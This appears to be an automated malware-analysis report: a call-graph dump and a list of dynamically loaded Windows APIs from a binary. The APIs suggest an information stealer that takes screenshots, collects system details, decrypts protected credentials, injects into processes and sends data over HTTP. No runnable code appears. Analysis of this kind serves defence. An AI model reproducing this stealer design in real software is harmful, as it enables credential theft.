13531 41392d 13530->13531 13532 410290 lstrcpyA 13531->13532 13533 413935 13532->13533 13534 410340 3 API calls 13533->13534 13535 413949 13534->13535 13536 410290 lstrcpyA 13535->13536 13537 413951 13536->13537 13538 410340 3 API calls 13537->13538 13539 413965 13538->13539 13540 410290 lstrcpyA 13539->13540 13541 41396d 13540->13541 13907 4110a0 7 API calls 13541->13907 13544 4102e0 2 API calls 13545 413983 13544->13545 13546 410290 lstrcpyA 13545->13546 13547 41398b 13546->13547 13548 410340 3 API calls 13547->13548 13549 4139a6 13548->13549 13550 410290 lstrcpyA 13549->13550 13551 4139ae 13550->13551 13552 410340 3 API calls 13551->13552 13553 4139c2 13552->13553 13554 410290 lstrcpyA 13553->13554 13555 4139ca 13554->13555 13910 4109f0 13555->13910 13558 4102e0 2 API calls 13559 4139e0 13558->13559 13560 410290 lstrcpyA 13559->13560 13561 4139e8 13560->13561 13562 410340 3 API calls 13561->13562 13563 413a03 13562->13563 13564 410290 lstrcpyA 13563->13564 13565 413a0b 13564->13565 13566 410340 3 API calls 13565->13566 13567 413a1f 13566->13567 13568 410290 lstrcpyA 13567->13568 13569 413a27 13568->13569 13928 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13569->13928 13571 413a33 13572 410340 3 API calls 13571->13572 13573 413a3c 13572->13573 13574 410290 lstrcpyA 13573->13574 13575 413a44 13574->13575 13576 410340 3 API calls 13575->13576 13577 413a58 13576->13577 13578 410290 lstrcpyA 13577->13578 13579 413a60 13578->13579 13580 410340 3 API calls 13579->13580 13581 413a74 13580->13581 13582 410290 lstrcpyA 13581->13582 13583 413a7c 13582->13583 13929 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13583->13929 13586 410340 3 API calls 13587 413a91 13586->13587 13588 410290 lstrcpyA 13587->13588 13589 413a99 13588->13589 13590 410340 3 API calls 13589->13590 13591 413aad 13590->13591 13592 410290 lstrcpyA 13591->13592 13593 413ab5 13592->13593 13594 410340 3 API calls 13593->13594 13595 413ac9 13594->13595 13596 410290 lstrcpyA 13595->13596 
13597 413ad1 13596->13597 13598 410340 3 API calls 13597->13598 13599 413ae5 13598->13599 13600 410290 lstrcpyA 13599->13600 13601 413aed 13600->13601 13932 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13601->13932 13603 413af9 13604 410340 3 API calls 13603->13604 13605 413b02 13604->13605 13606 410290 lstrcpyA 13605->13606 13607 413b0a 13606->13607 13608 410340 3 API calls 13607->13608 13609 413b1e 13608->13609 13610 410290 lstrcpyA 13609->13610 13611 413b26 13610->13611 13612 410340 3 API calls 13611->13612 13613 413b3a 13612->13613 13614 410290 lstrcpyA 13613->13614 13615 413b42 13614->13615 13935 410be0 13615->13935 13618 410340 3 API calls 13619 413b57 13618->13619 13620 410290 lstrcpyA 13619->13620 13621 413b5f 13620->13621 13622 410340 3 API calls 13621->13622 13623 413b73 13622->13623 13624 410290 lstrcpyA 13623->13624 13625 413b7b 13624->13625 13626 410340 3 API calls 13625->13626 13627 413b8f 13626->13627 13628 410290 lstrcpyA 13627->13628 13629 413b97 13628->13629 13952 410ba0 GetSystemInfo wsprintfA 13629->13952 13631 413ba3 13632 410340 3 API calls 13631->13632 13633 413bac 13632->13633 13634 410290 lstrcpyA 13633->13634 13635 413bb4 13634->13635 13636 410340 3 API calls 13635->13636 13637 413bc8 13636->13637 13638 410290 lstrcpyA 13637->13638 13639 413bd0 13638->13639 13640 410340 3 API calls 13639->13640 13641 413be4 13640->13641 13642 410290 lstrcpyA 13641->13642 13643 413bec 13642->13643 13953 410cb0 GetProcessHeap HeapAlloc 13643->13953 13645 413bf8 13646 410340 3 API calls 13645->13646 13647 413c01 13646->13647 13648 410290 lstrcpyA 13647->13648 13649 413c09 13648->13649 13650 410340 3 API calls 13649->13650 13651 413c1d 13650->13651 13652 410290 lstrcpyA 13651->13652 13653 413c25 13652->13653 13654 410340 3 API calls 13653->13654 13655 413c39 13654->13655 13656 410290 lstrcpyA 13655->13656 13657 413c41 13656->13657 13956 410d30 13657->13956 13660 4102e0 2 API calls 13661 413c57 13660->13661 13662 410290 lstrcpyA 13661->13662 13663 413c5f 
13662->13663 13664 410340 3 API calls 13663->13664 13665 413c7a 13664->13665 13666 410290 lstrcpyA 13665->13666 13667 413c82 13666->13667 13668 410340 3 API calls 13667->13668 13669 413c96 13668->13669 13670 410290 lstrcpyA 13669->13670 13671 413c9e 13670->13671 13961 410fe0 13671->13961 13673 413cab 13674 4102e0 2 API calls 13673->13674 13675 413cb4 13674->13675 13676 410290 lstrcpyA 13675->13676 13677 413cbc 13676->13677 13678 410340 3 API calls 13677->13678 13679 413cd7 13678->13679 13680 410290 lstrcpyA 13679->13680 13681 413cdf 13680->13681 13682 410340 3 API calls 13681->13682 13683 413cf3 13682->13683 13684 410290 lstrcpyA 13683->13684 13685 413cfb 13684->13685 13970 410d80 13685->13970 13688 4102e0 2 API calls 13689 413d16 13688->13689 13690 410290 lstrcpyA 13689->13690 13691 413d1e 13690->13691 13692 410d80 16 API calls 13691->13692 13693 413d37 13692->13693 13694 4102e0 2 API calls 13693->13694 13695 413d40 13694->13695 13696 410290 lstrcpyA 13695->13696 13697 413d48 13696->13697 13698 410340 3 API calls 13697->13698 13699 413d63 13698->13699 13700 410290 lstrcpyA 13699->13700 13701 413d6b 13700->13701 13702 413d8a lstrlenA 13701->13702 13703 413d97 13702->13703 13704 4101c0 lstrcpyA 13703->13704 13705 413da7 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413db3 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dbf 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413dcb 13710->13711 13712 410200 lstrcpyA 13711->13712 13713 413de1 13712->13713 13986 413e50 13713->13986 13715 413e0f 13715->12602 13717 40e806 13716->13717 13755 40e456 13716->13755 13718 410200 lstrcpyA 13717->13718 13719 40e81a 13718->13719 13721 410200 lstrcpyA 13719->13721 13720 40e4ad StrCmpCA 13720->13755 13722 40e829 13721->13722 13723 410200 lstrcpyA 13722->13723 13725 40e838 13723->13725 13724 40e5b3 StrCmpCA 13724->13755 13726 410200 lstrcpyA 13725->13726 13728 40e84e 13726->13728 13727 4101c0 lstrcpyA 13727->13755 14793 40d9c0 memset memset memset memset 
RegOpenKeyExA 13728->14793 13729 40e73a StrCmpCA 13729->13755 13731 410340 lstrlenA lstrcpyA lstrcatA 13731->13755 13732 40e86b 13733 410200 lstrcpyA 13732->13733 13735 40e87c 13733->13735 13734 4102e0 2 API calls 13734->13755 13736 410200 lstrcpyA 13735->13736 13737 40e887 13736->13737 13738 410200 lstrcpyA 13737->13738 13740 40e892 13738->13740 13739 410290 lstrcpyA 13739->13755 13741 410200 lstrcpyA 13740->13741 13742 40e8a8 13741->13742 14828 40de80 13742->14828 13743 410200 lstrcpyA 13743->13755 13747 40e91d StrCmpCA 13761 40e8c5 13747->13761 13748 40ea23 StrCmpCA 13748->13761 13749 40ec76 13750 4101c0 lstrcpyA 13750->13761 13751 40ebaa StrCmpCA 13751->13761 13752 4102e0 2 API calls 13752->13761 13753 410340 lstrlenA lstrcpyA lstrcatA 13753->13761 13754 410290 lstrcpyA 13754->13761 13755->13717 13755->13720 13755->13724 13755->13727 13755->13729 13755->13731 13755->13734 13755->13739 13755->13743 14498 40b0f0 13755->14498 14574 40b4e0 13755->14574 14731 40cdf0 13755->14731 13756 40b0f0 443 API calls 13756->13761 13758 40cdf0 61 API calls 13758->13761 13759 410200 lstrcpyA 13759->13761 13760 40b4e0 444 API calls 13760->13761 13761->13747 13761->13748 13761->13749 13761->13750 13761->13751 13761->13752 13761->13753 13761->13754 13761->13756 13761->13758 13761->13759 13761->13760 13763 410409 13762->13763 13764 4103b2 13762->13764 13765 4103d7 lstrcpyA 13764->13765 13766 4103c9 13764->13766 13765->13766 13766->12851 13768 410200 lstrcpyA 13767->13768 13769 416930 13768->13769 13770 410200 lstrcpyA 13769->13770 13771 416939 13770->13771 13810 404280 13771->13810 13773 416943 13774 4101c0 lstrcpyA 13773->13774 13775 416954 13774->13775 13836 410500 StrCmpCA 13775->13836 13777 41695c 13777->12888 13779 4169dd 13778->13779 13780 4101c0 lstrcpyA 13779->13780 13781 4169f1 13780->13781 13782 410200 lstrcpyA 13781->13782 13783 4169fa 13782->13783 13784 404280 21 API calls 13783->13784 13785 416a04 13784->13785 13786 410290 lstrcpyA 13785->13786 13787 416a11 13786->13787 
13788 416a25 StrCmpCA 13787->13788 13789 416a35 13788->13789 13790 416abb 13788->13790 13792 416a45 lstrlenA 13789->13792 13791 4101c0 lstrcpyA 13790->13791 13805 416ab9 13791->13805 13793 416a51 13792->13793 13845 4115b0 13793->13845 13795 416a58 13795->13790 13796 416a5c 13795->13796 13797 416a6c StrStrA 13796->13797 13798 416a7e 13797->13798 13797->13805 13800 416a8e lstrlenA 13798->13800 13799 4101c0 lstrcpyA 13799->13805 13849 411490 13800->13849 13803 416ab0 13807 4101c0 lstrcpyA 13803->13807 13804 416b28 13806 4101c0 lstrcpyA 13804->13806 13805->13799 13806->13805 13807->13805 13808->12870 13809->12888 13811 410200 lstrcpyA 13810->13811 13812 4042a9 13811->13812 13837 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13812->13837 13814 4042b3 13815 4101c0 lstrcpyA 13814->13815 13816 4042c2 13815->13816 13817 4042cf InternetOpenA StrCmpCA 13816->13817 13818 404302 InternetConnectA 13817->13818 13819 404444 13817->13819 13818->13819 13820 40433b HttpOpenRequestA 13818->13820 13823 4101c0 lstrcpyA 13819->13823 13821 404371 13820->13821 13822 40446b InternetCloseHandle 13820->13822 13824 404377 InternetSetOptionA 13821->13824 13825 40438d HttpSendRequestA HttpQueryInfoA 13821->13825 13822->13819 13832 404451 13823->13832 13824->13825 13826 4043c1 13825->13826 13827 40445c 13825->13827 13826->13827 13835 4043d2 13826->13835 13828 4101c0 lstrcpyA 13827->13828 13828->13832 13829 404477 InternetCloseHandle 13831 410200 lstrcpyA 13829->13831 13830 4043f0 InternetReadFile 13830->13829 13830->13835 13831->13832 13832->13773 13833 410340 3 API calls 13833->13835 13834 410290 lstrcpyA 13834->13835 13835->13829 13835->13830 13835->13833 13835->13834 13836->13777 13843 410530 13837->13843 13839 4028e9 lstrlenA 13844 410530 13839->13844 13841 4028f5 InternetCrackUrlA 13842 402903 13841->13842 13842->13814 13843->13839 13844->13841 13846 4115c2 13845->13846 13848 4115e2 13845->13848 13847 4115ce LocalAlloc 13846->13847 13846->13848 13847->13848 13848->13795 13848->13848 13850 
41149b lstrlenA 13849->13850 13850->13803 13850->13804 13852 410720 13851->13852 13853 41079e 13851->13853 13854 4101c0 lstrcpyA 13852->13854 13855 4101c0 lstrcpyA 13853->13855 13856 410730 memset 13854->13856 13857 4107aa 13855->13857 13858 410754 13856->13858 13857->12917 13859 411e60 3 API calls 13858->13859 13860 410761 13859->13860 13861 410768 lstrcatA 13860->13861 13870 410230 13861->13870 13863 41077a lstrcatA 13864 41078d 13863->13864 13865 4101c0 lstrcpyA 13864->13865 13866 410795 13865->13866 13866->13857 13868 4101c0 lstrcpyA 13867->13868 13869 411e96 13868->13869 13869->12921 13871 410237 13870->13871 13871->13863 13872->13068 13873->13249 13874->13255 13876 4077b8 LocalAlloc 13875->13876 13878 40402f 13876->13878 13878->13112 13878->13114 13879->13274 13881 4101c0 lstrcpyA 13880->13881 13882 411597 13881->13882 13882->13294 13883->13315 13884->13364 13885->13394 13887 4111d5 RegCloseKey CharToOemA 13886->13887 13888 4111b8 RegQueryValueExA 13886->13888 13887->13408 13888->13887 13890 411d01 13889->13890 13891 411ce7 K32GetModuleFileNameExA CloseHandle 13889->13891 13892 4101c0 lstrcpyA 13890->13892 13891->13890 13893 411d0b 13892->13893 13893->13452 13895 410824 RegQueryValueExA 13894->13895 13896 41083d RegCloseKey 13894->13896 13895->13896 13897 41084c 13896->13897 13898 41089b 13897->13898 13899 41085b RegOpenKeyExA 13897->13899 13898->13474 13900 410890 RegCloseKey 13899->13900 13901 410877 RegQueryValueExA 13899->13901 13900->13898 13901->13900 13903 4101c0 lstrcpyA 13902->13903 13904 411211 13903->13904 13904->13488 13905->13515 13906->13529 13908 4101c0 lstrcpyA 13907->13908 13909 41110b 13908->13909 13909->13544 13911 4101c0 lstrcpyA 13910->13911 13912 410a0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 13911->13912 13913 410a3b GetLocaleInfoA 13912->13913 13927 410b0f 13912->13927 13914 410340 3 API calls 13913->13914 13917 410a64 13914->13917 13915 410b17 LocalFree 13916 410b1e 13915->13916 13916->13558 13918 410290 lstrcpyA 
13917->13918 13919 410a6c 13918->13919 14002 411270 13919->14002 13921 410aa0 GetLocaleInfoA 13922 410340 3 API calls 13921->13922 13923 410a84 13922->13923 13923->13915 13923->13921 13924 410340 3 API calls 13923->13924 13925 410290 lstrcpyA 13923->13925 13926 411270 memset 13923->13926 13923->13927 13924->13923 13925->13923 13926->13923 13927->13915 13927->13916 13928->13571 13930 4109e5 13929->13930 13931 4109bd wsprintfA 13929->13931 13930->13586 13931->13930 13933 410b72 RegQueryValueExA 13932->13933 13934 410b8b RegCloseKey 13932->13934 13933->13934 13934->13603 13936 410c12 GetLogicalProcessorInformationEx 13935->13936 13937 410c36 13936->13937 13938 410c1f GetLastError 13936->13938 13941 410c97 13937->13941 13942 410c3d 13937->13942 13939 410c86 13938->13939 13940 410c2a 13938->13940 13944 410c95 13939->13944 13945 4112b0 2 API calls 13939->13945 13948 410c00 13940->13948 13943 4112b0 2 API calls 13941->13943 13949 4112b0 2 API calls 13942->13949 13943->13944 13944->13618 13945->13944 13948->13936 13948->13944 14005 4112e0 GetProcessHeap HeapAlloc 13948->14005 14006 4112b0 13948->14006 13950 410c6c 13949->13950 13950->13944 13951 410c70 wsprintfA 13950->13951 13951->13944 13952->13631 13954 411270 memset 13953->13954 13955 410cdf GlobalMemoryStatusEx wsprintfA 13954->13955 13955->13645 13957 4101c0 lstrcpyA 13956->13957 13958 410d4a 13957->13958 13959 410d70 13958->13959 13960 410240 2 API calls 13958->13960 13959->13660 13960->13959 13962 4101c0 lstrcpyA 13961->13962 13963 410ffd CreateToolhelp32Snapshot Process32First 13962->13963 13964 411021 Process32Next 13963->13964 13965 411084 CloseHandle 13963->13965 13964->13965 13968 411031 13964->13968 13965->13673 13966 410290 lstrcpyA 13966->13968 13967 410340 lstrlenA lstrcpyA lstrcatA 13967->13968 13968->13966 13968->13967 13969 411074 Process32Next 13968->13969 13969->13965 13969->13968 13971 4101c0 lstrcpyA 13970->13971 13972 410da4 RegOpenKeyExA 13971->13972 13973 410fcc 13972->13973 13974 410ddc 
RegEnumKeyExA 13972->13974 13973->13688 13975 410fbb RegCloseKey 13974->13975 13976 410e1e 13974->13976 13975->13973 13977 410e74 wsprintfA RegOpenKeyExA 13976->13977 13978 410fb1 RegCloseKey 13977->13978 13979 410eae RegQueryValueExA 13977->13979 13978->13975 13980 410e30 RegCloseKey RegEnumKeyExA 13979->13980 13981 410edb lstrlenA 13979->13981 13980->13975 13980->13977 13981->13980 13985 410eeb 13981->13985 13982 410f39 RegQueryValueExA 13982->13980 13982->13985 13983 410340 lstrlenA lstrcpyA lstrcatA 13983->13985 13984 410290 lstrcpyA 13984->13985 13985->13980 13985->13982 13985->13983 13985->13984 13987 413e69 13986->13987 13988 410290 lstrcpyA 13987->13988 13989 413eac 13988->13989 13990 410290 lstrcpyA 13989->13990 13991 413ee1 13990->13991 13992 410290 lstrcpyA 13991->13992 13993 413eef 13992->13993 13994 410290 lstrcpyA 13993->13994 13995 413efb 13994->13995 13996 413f0a Sleep 13995->13996 13999 413f17 13995->13999 13996->13995 13997 413f5a CreateThread WaitForSingleObject 13998 4101c0 lstrcpyA 13997->13998 14271 416ea0 13997->14271 14001 413f8b 13998->14001 13999->13997 14009 41e4c0 13999->14009 14001->13715 14003 411289 14002->14003 14004 411278 memset 14002->14004 14003->13923 14004->14003 14005->13948 14007 4112ba GetProcessHeap HeapFree 14006->14007 14008 4112cc 14006->14008 14007->14008 14008->13948 14010 41e4f0 14009->14010 14011 41e4c8 14009->14011 14010->13997 14012 41e4e8 14011->14012 14014 41dd60 14011->14014 14012->13997 14015 41dd75 14014->14015 14067 41dd82 14014->14067 14016 41dd91 lstrcpyA 14015->14016 14015->14067 14017 41ddd0 14016->14017 14016->14067 14018 41de32 strlen 14017->14018 14019 41de09 14017->14019 14021 41de17 14018->14021 14071 41d0c0 lstrlenA 14019->14071 14022 41def3 14021->14022 14023 41de6c 14021->14023 14024 41d590 14 API calls 14022->14024 14025 41de75 14023->14025 14026 41df04 14023->14026 14034 41df02 14024->14034 14028 41df1f 14025->14028 14029 41de7e 14025->14029 14091 41d710 14026->14091 14028->14067 14095 41d850 
GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14028->14095 14030 41dea8 CreateFileA 14029->14030 14029->14067 14032 41ded5 14030->14032 14030->14067 14082 41d590 14032->14082 14033 41df42 lstrcpyA lstrcpyA lstrlenA 14036 41df8c lstrcpyA 14033->14036 14037 41df7c lstrcatA 14033->14037 14034->14033 14034->14067 14097 41e500 14036->14097 14037->14036 14039 41dee5 CloseHandle 14039->14067 14067->14012 14067->14067 14073 41d0d5 14071->14073 14072 41d0f7 StrCmpCA 14074 41d17c 14072->14074 14075 41d109 StrCmpCA 14072->14075 14073->14072 14073->14074 14074->14021 14075->14074 14076 41d119 StrCmpCA 14075->14076 14076->14074 14077 41d129 StrCmpCA 14076->14077 14077->14074 14078 41d139 StrCmpCA 14077->14078 14078->14074 14079 41d149 StrCmpCA 14078->14079 14079->14074 14080 41d159 StrCmpCA 14079->14080 14080->14074 14081 41d169 StrCmpCA 14080->14081 14081->14074 14083 41d5d8 SetFilePointer 14082->14083 14084 41d5cc 14082->14084 14085 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14083->14085 14086 41d5ee 14083->14086 14084->14034 14084->14039 14088 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14085->14088 14232 41d190 GetFileInformationByHandle 14086->14232 14090 41d60a SetFilePointer 14090->14084 14092 41d769 14091->14092 14093 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14091->14093 14092->14093 14094 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14092->14094 14093->14034 14094->14093 14096 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14095->14096 14096->14034 14098 41d3f0 5 API calls 14097->14098 14099 41e521 14098->14099 14100 41d3f0 5 API calls 14099->14100 14101 41e530 14100->14101 14102 41d3f0 5 API calls 14101->14102 14103 41e543 14102->14103 14104 41d3f0 5 API calls 14103->14104 14105 41e552 14104->14105 14106 41d3f0 5 API calls 14105->14106 14107 41e568 14106->14107 14108 41d3f0 5 API calls 14107->14108 14109 41e57a 14108->14109 14110 41d3f0 5 API calls 14109->14110 14111 41e590 14110->14111 14112 41d3f0 5 
API calls 14111->14112 14113 41e5a2 14112->14113 14114 41d3f0 5 API calls 14113->14114 14115 41e5b8 14114->14115 14116 41d3f0 5 API calls 14115->14116 14117 41e5ca 14116->14117 14118 41d3f0 5 API calls 14117->14118 14119 41e5e0 14118->14119 14120 41d3f0 5 API calls 14119->14120 14121 41e5f2 14120->14121 14122 41d3f0 5 API calls 14121->14122 14123 41e608 14122->14123 14124 41d3f0 5 API calls 14123->14124 14125 41e61a 14124->14125 14126 41d3f0 5 API calls 14125->14126 14127 41e630 14126->14127 14128 41d3f0 5 API calls 14127->14128 14129 41e642 14128->14129 14130 41d3f0 5 API calls 14129->14130 14131 41e658 14130->14131 14132 41d3f0 5 API calls 14131->14132 14133 41e66a 14132->14133 14134 41d3f0 5 API calls 14133->14134 14135 41e680 14134->14135 14136 41d3f0 5 API calls 14135->14136 14137 41e692 14136->14137 14138 41d3f0 5 API calls 14137->14138 14139 41e6a8 14138->14139 14140 41d3f0 5 API calls 14139->14140 14141 41e6ba 14140->14141 14142 41d3f0 5 API calls 14141->14142 14143 41e6d0 14142->14143 14144 41d3f0 5 API calls 14143->14144 14145 41e6e2 14144->14145 14146 41d3f0 5 API calls 14145->14146 14233 41d29a 14232->14233 14234 41d1af GetFileSize 14232->14234 14233->14084 14233->14090 14235 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 14234->14235 14239 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14234->14239 14236 41d243 14235->14236 14235->14239 14237 41d24e SetFilePointer ReadFile 14236->14237 14236->14239 14237->14239 14238 41d330 FileTimeToSystemTime 14238->14233 14239->14233 14239->14238 14282 410530 14271->14282 14273 416ebf lstrlenA 14274 416f9e 14273->14274 14278 416eca 14273->14278 14275 410200 lstrcpyA 14275->14278 14277 410290 lstrcpyA 14277->14278 14278->14275 14278->14277 14279 416f71 StrCmpCA 14278->14279 14283 403090 14278->14283 14279->14278 14280 416f81 14279->14280 14281 411270 memset 14280->14281 14281->14274 14282->14273 14284 4101c0 lstrcpyA 14283->14284 14285 4030b2 14284->14285 14286 410200 lstrcpyA 14285->14286 14287 4030c2 

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
• LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
• LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
• LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
• LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
• LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
• LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
• LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
• GetProcAddress.KERNEL32(75FD0000,CreateCompatibleBitmap), ref: 00418DA1
• GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
• GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
• GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
• GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
• GetProcAddress.KERNEL32(734B0000,GdipGetImageEncodersSize), ref: 00418E17
• GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
• GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
• GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
• GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
• GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
• GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
• GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
• GetProcAddress.KERNEL32(763B0000,GetHGlobalFromStream), ref: 00418ECB
• GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
• GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
• GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
• GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
• GetProcAddress.KERNEL32(750F0000,BCryptGenerateSymmetricKey), ref: 00418F3D
• GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
• GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
• GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
• GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
• GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
• GetProcAddress.KERNEL32(75A50000,GetWindowRect), ref: 00418FC9
• GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
• GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
• GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
• GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
• GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
• GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
• GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
• GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
• GetProcAddress.KERNEL32(75070000,RegQueryValueExA), ref: 00419093
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74E50000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75320000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F060000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74E00000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DF0000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6E570000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CD20000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                      • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMem